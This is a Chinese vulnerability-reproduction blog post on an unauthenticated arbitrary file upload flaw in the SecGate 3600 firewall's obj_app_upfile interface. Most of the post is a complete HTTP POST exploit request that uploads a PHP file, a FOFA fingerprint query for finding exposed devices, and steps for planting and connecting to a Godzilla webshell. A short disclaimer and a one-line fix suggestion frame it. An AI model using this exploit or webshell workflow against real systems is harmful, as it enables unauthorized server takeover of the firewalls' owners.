网神 SecGate 3600 防火墙任意文件上传漏洞

已于 2023-08-14 09:51:15 修改
阅读量507 收藏
点赞数
分类专栏: 2023年HW专题 网络安全漏洞复现 文章标签: 网络安全 python
于 2023-08-11 14:09:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/holyxp/article/details/132229977
版权

网神 SecGate 3600 防火墙任意文件上传漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

​ 网神SecGate3600下一代极速防火墙(NSG系列) 在专业防火墙、VPN、IPS的多年产品经验积累基础上精心研发的高性能下一代防火墙 专门为运营商、政府、军队、教育、大型企业、中小型企业的互联网出口打造的集防火墙、抗DDoS攻击、VPN、内容过滤、IPS、带宽管理、用户认证等多项安全技术于一身的主动防御智能安全网关。

二、 漏洞概述

​ 网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。

三、 影响范围

​ 网神 SecGate 3600 防火墙

四、 复现环境

FOFA语句:fid=“1Lh1LHi6yfkhiO83I59AYg==”

在这里插入图片描述

五、 漏洞复现

PoC

POST /?g=obj_app_upfile HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
 
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
 
100000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="2.php"
Content-Type: text/plain
 
这里输入你的代码
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
 
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
 
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

上传哥斯拉马子

在这里插入图片描述
验证url

https://ip/attachements/2.php

尝试连接

在这里插入图片描述
在这里插入图片描述

小龙POC检测:

在这里插入图片描述

六、 修复建议

关闭互联网暴露面,文件上传模块设置权限强认证。

安全攻防赵小龙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网神SecGate 3600防火墙 obj_app_upfile 文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-05 15
网神SecGate 3600防火墙 obj_app_upfile 文件上传漏洞(含批量验证poc)
网神SecGate 3600下一代极速防火墙NSG系列功能配置及维护手册V10.4.1.pdf
06-27
网神SecGate 3600下一代极速防火墙NSG系列功能配置及维护手册V10.4.1
(0day)含POC-网神secgate-index某防火墙存在文件上传漏洞-新接口!!!
最新发布
weixin_43167326的博客
03-18 482
国产化网神SecGate3600防火墙是一款能够全面应对传统网络攻击和高级威胁的创新型防火墙产品,基于麒麟操作系统与飞腾硬件平台打造,可广泛运用于政府机构、各类企业和组织的业务网络边界,实现网络安全域隔离、精细化访问控制、高效的威胁防护和高级威胁检测等功能。该产品在下一代防火墙基础上超越性的集成了威胁情报、大数据分析和安全可视化等创新安全技术,并通过与网络威胁感知中心、安全管理分析申心、终端安全管理系统等的智能协同,为用户在网络边界构建数据驱动的新一代威胁防御平台。
漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞
qq_52612931的博客
01-02 426
微信公众号:不秃头的安全。
网神防火墙后台用户登录账号泄露漏洞复现
精品博客,你值得一看~
12-19 725
网神防火墙是一款中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击.该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码.
奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
weixin_52204925的博客
02-13 626
奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
网神 SecGate 3600 防火墙任意文件上传漏洞复现
0xSec
08-10 3343
网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
Goby 漏洞发布|网神SecGate 3600防火墙 sys_export_conf_local_save 文件读取漏洞
m0_46699477的博客
06-21 595
网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙,是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备,支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能,能够有效地保证网络的安全;产品提供灵活的网络路由/桥接能力,支持策略路由,多出口链路聚合;提供多种智能分析和管理手段,支持邮件告警,支持日志审计,提供全面的网络管理监控,协助网络管理员完成网络的安全管理。网神SecGate 3
漏洞复现】网神-SecGate-3600防火墙-sys_hand-任意文件上传
知黑而守白
01-18 384
网神 SecGate3600 防火墙(以下简称为:防火墙)是奇安信集团自主创新的新一代防火墙安全系统,基于 NDR(基于网络的检测与响应)安全体系,在高性能和先进架构的支撑下,集成了防火墙、VPN、应用与身份识别、防病毒、入侵防御、虚拟系统、行为管理、应用层内容安全防护、威胁情报等综合安全防御功能,并支持与天眼、终端管理系统、NGSOC、天御云等多系统进行协同防御。网神 SecGate3600 防火墙某接口处存在文件上传漏洞,攻击者可以通过构特殊的数据包上传恶意代码文件到系统,从而带来严重安全威胁。
泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648)
weixin_68647219的博客
08-16 3675
网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
网神 SecGate 3600 防火墙 多处任意文件上传漏洞复现
0xSec
12-13 758
网神SecGate 3600防火墙obj_area_import_save、app_av_import_save、sec_web_auth_custom_setting_confsave存在文件上传漏洞,攻击者可以通过该漏洞获取服务器控制权限。
网神SecGate 3600防火墙(NSG系列)用户手册V16.9.1.pdf
04-26
网神SecGate 3600防火墙(NSG系列)用户手册V16.9.1.pdf
网神SecGate3600防火墙 用户手册
06-26
本手册是《网神SecGate3600防火墙 用户手册》,主要介绍网神SecGate3600防火墙Web管理界面支持的各项功能及配置步骤。 本文档主要适用用于负责配置和维护防火墙的安全管理员。 本手册默认用户掌握TCP/IP协议、IP地址...
网神SecGate3600防火墙快速指南.pdf
03-13
网神SecGate3600防火墙快速指南.pdf
网神SecGate 3600防火墙NSG系列快速入门指南V4.0.pdf
12-20
网神SecGate 3600防火墙NSG系列快速入门指南V4.0.pdf,公司购买该防火墙光盘中所带文档拷贝而出
网神SecGate3600防火墙系统(飞腾平台) 用户手册【60.1.12.89655_01】.pdf
04-23
网神SecGate3600防火墙系统(飞腾平台) 用户手册
漏洞复现-网神SecGate3600防火墙敏感信息泄露漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-16 671
漏洞复现-网神SecGate3600防火墙敏感信息泄露漏洞,附带自己写的poc脚本
网神 SecGate 3600 防火墙 route_ispinfo_import_save 文件上传漏洞
weixin_52204925的博客
02-07 1026
网神 SecGate 3600 防火墙 route_ispinfo_import_save 文件上传漏洞
Goby 漏洞发布|网神 SecGate 3600 防火墙 obj_area_import_save 文件上传漏洞
m0_46699477的博客
07-21 306
网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙,是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备,支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能,能够有效地保证网络的安全;产品提供灵活的网络路由/桥接能力,支持策略路由,多出口链路聚合;提供多种智能分析和管理手段,支持邮件告警,支持日志审计,提供全面的网络管理监控,协助网络管理员完成网络的安全管理
网神SecVSS 3600漏洞扫描系统
06-13
网神SecVSS 3600漏洞扫描系统是一款由网神公司开发的漏洞扫描软件,其主要功能是通过扫描网络上的主机和设备,检测出其中存在的漏洞和安全风险,并提供相应的修复建议和防护措施。该软件具有快速、准确、可靠等特点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全攻防赵小龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值